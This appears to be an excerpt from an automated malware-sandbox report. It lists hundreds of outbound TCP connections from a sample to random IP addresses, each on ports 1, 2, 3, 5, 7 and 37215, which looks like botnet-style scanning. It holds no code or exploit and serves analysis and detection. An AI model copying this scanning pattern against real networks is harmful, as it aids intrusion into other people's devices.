      Source: global trafficTCP traffic: 60.72.138.139 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.22.141.231 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.248.192.124 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 19.78.162.5 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 189.227.161.156 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.18.52.168 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 57.27.69.249 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 111.98.152.63 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 75.240.47.32 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.85.157.143 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.244.185.22 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.81.48.2 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.196.19.115 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.32.235.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.136.218.101 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.8.52.20 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.8.35.78 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.51.43.80 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 8.81.85.227 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 142.45.24.133 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 68.167.132.64 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.8.168.4 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.239.179.252 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.149.118.32 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.64.118.151 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.209.3.95 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.153.152.240 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.120.192.239 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 167.80.53.60 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.244.246.101 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.92.181.103 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 52.152.250.38 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.74.117.239 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 109.145.71.165 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.238.131.146 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 118.249.101.169 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 12.166.61.57 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.131.104.150 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.219.86.33 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.72.236.35 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.249.247.237 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.248.71.246 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.112.116.96 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.253.52.172 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.165.31.177 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.42.237.105 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.210.162.117 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.117.175.234 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 136.126.146.116 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.28.223.230 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.92.187.16 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.162.88.59 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 34.79.181.217 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.79.97.251 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.234.115.93 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.224.91.112 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 221.93.237.99 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 102.163.8.199 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 70.49.138.209 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.218.121.168 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.101.3.82 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.129.153.123 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 182.158.131.35 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.56.0.64 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.205.69.34 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 174.127.151.238 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.132.198.214 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.25.54.63 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.72.222.192 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 79.145.19.60 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.121.110.43 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.217.32.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.135.123.15 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.233.121.12 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 176.165.29.216 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.150.0.153 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.18.35.200 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.170.133.38 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.187.43.103 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.198.226.219 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.210.76.62 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.31.126.129 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 94.222.254.126 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.20.214.140 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.195.59.237 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.145.5.206 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.60.239.50 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 210.131.37.36 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 179.95.38.49 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.29.130.126 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 202.58.238.201 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 78.181.55.156 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 173.251.233.80 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.244.123.81 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.234.212.55 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 184.247.16.202 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.153.174.133 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.223.24.124 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.56.74.159 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.197.182.82 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.129.142.215 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.143.122.180 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 18.251.22.181 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.27.24.146 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.88.2.173 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.74.44.89 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.32.234.208 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 67.166.248.79 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.158.227.39 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 5.31.33.128 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.31.155.223 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.27.86.26 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.94.61.243 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.49.55.41 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.185.106.254 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 182.235.102.46 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.210.96.49 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.77.24.174 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.165.210.55 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 138.124.166.192 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 2.196.51.31 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.217.213.110 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.209.56.158 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.8.64.183 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.53.12.14 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.47.60.68 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.30.250.76 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.234.189.164 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.61.142.226 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.232.165.51 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.0.0.71 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.119.171.199 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.38.53.198 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.109.69.68 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.124.10.13 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.100.208.140 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.59.76.62 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 31.48.82.213 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 133.227.109.38 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.97.138.119 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 173.40.40.177 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.124.20.231 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.15.241.242 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.27.66.117 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.90.114.11 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.253.255.31 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.37.22.210 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.203.1.191 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 52.64.152.156 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.149.251.27 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.220.183.74 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.129.42.137 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.86.248.201 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 5.201.10.245 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.190.4.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.32.214.176 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.249.92.241 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.6.113.140 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.211.48.130 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.204.2.210 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 162.199.37.227 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.189.6.49 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.206.202.158 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.134.179.219 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 59.10.198.202 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 222.152.153.198 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 40.248.101.97 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 131.97.204.174 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 181.83.194.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.152.5.216 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.110.34.192 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.149.79.86 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.108.76.6 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.38.185.194 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.111.111.201 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.34.117.25 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.1.126.71 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.179.174.152 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.226.129.160 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.99.238.3 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.120.59.5 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.50.105.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.249.68.225 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.40.88.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.86.197.174 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 144.59.241.119 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.174.224.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.167.139.23 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.119.117.236 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.23.15.134 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.89.100.75 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.108.163.57 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.164.48.170 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.149.185.86 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.159.154.67 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.25.248.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.135.210.107 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 94.252.250.153 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 160.4.125.214 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.220.251.218 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.65.107.128 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 132.63.250.172 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.233.121.175 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.162.130.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.215.132.123 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.161.230.195 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 80.84.87.191 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.148.172.75 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.42.220.50 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 84.78.57.32 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.94.118.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.94.22.5 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 59.197.130.61 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 140.138.186.192 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.98.221.252 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 195.180.198.25 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.109.148.108 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.46.79.244 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 168.53.71.52 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.13.128.136 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.51.221.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.103.92.181 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.96.102.109 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.64.54.8 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.154.188.41 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.57.131.31 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.54.233.252 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.128.133.136 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.120.235.100 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 19.179.233.141 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.170.190.52 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.121.150.228 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.55.168.108 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.50.193.243 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.193.56.121 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.109.58.91 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.164.139.39 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.72.63.213 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.121.124.15 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 95.210.36.205 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.0.212.88 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.1.22.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.71.138.14 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.90.234.244 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.241.207.66 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 118.183.17.68 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 36.57.13.183 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.62.16.185 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 25.201.194.114 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 221.18.76.35 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 106.95.246.147 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.203.128.170 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.87.28.92 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.226.4.60 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.34.90.232 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 32.10.203.115 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.98.63.126 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.47.46.203 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.83.110.34 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.14.99.173 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.36.230.88 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 155.75.111.182 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.105.184.97 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.97.209.80 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.48.41.143 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.52.127.202 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.229.120.92 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 99.137.27.100 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.137.46.188 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 182.34.125.184 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.147.20.199 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.244.239.131 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.213.38.225 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.89.161.132 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.126.81.47 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 31.20.218.233 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.87.218.37 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.112.221.11 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 12.187.36.35 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.35.94.209 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.132.199.220 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 201.51.99.179 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.43.180.154 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.159.187.200 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 63.12.19.72 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.242.140.44 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 186.105.33.174 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 88.240.44.99 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.225.174.44 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 90.151.241.56 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.177.36.88 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.196.212.101 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.46.220.147 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.143.12.42 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.184.177.166 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.131.151.79 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.119.114.217 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.178.186.9 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.96.39.229 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.1.105.146 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 35.164.242.97 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.235.131.216 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 166.0.9.99 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.22.129.206 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.118.5.108 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 203.134.152.27 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 116.95.31.124 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.217.124.46 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.122.171.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.148.212.176 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 164.198.74.35 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.213.193.227 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.71.92.38 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.82.183.12 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.168.49.153 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.210.23.150 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 42.125.118.136 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.147.52.248 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.255.52.96 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.90.181.197 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.176.91.96 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.130.8.32 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.149.207.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 124.15.31.250 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.194.181.67 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.199.175.214 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.91.105.222 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.42.123.41 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.120.56.221 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.27.181.219 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.196.120.162 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.28.165.54 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.169.36.169 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.248.130.164 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.126.58.231 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.190.149.199 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.123.16.80 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 212.107.27.141 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.144.164.87 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.207.17.42 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 208.188.25.183 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.165.84.176 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.148.40.60 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.227.147.132 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.193.183.14 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.139.7.61 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.131.64.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.127.121.12 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 220.227.26.180 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.206.130.90 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.141.157.80 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.184.90.97 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.189.150.52 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 96.176.155.16 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.28.40.198 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 143.0.189.10 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.150.135.160 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.240.196.192 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.6.128.12 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 119.125.161.168 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.11.67.129 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 216.157.115.64 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.238.134.16 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.226.230.196 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.155.90.221 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.186.26.185 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.61.253.0 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.63.129.185 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.93.165.28 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.243.232.28 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.221.69.68 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.48.128.226 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.47.181.29 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.118.125.243 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.142.52.60 ports 1,2,3,5,7,37215
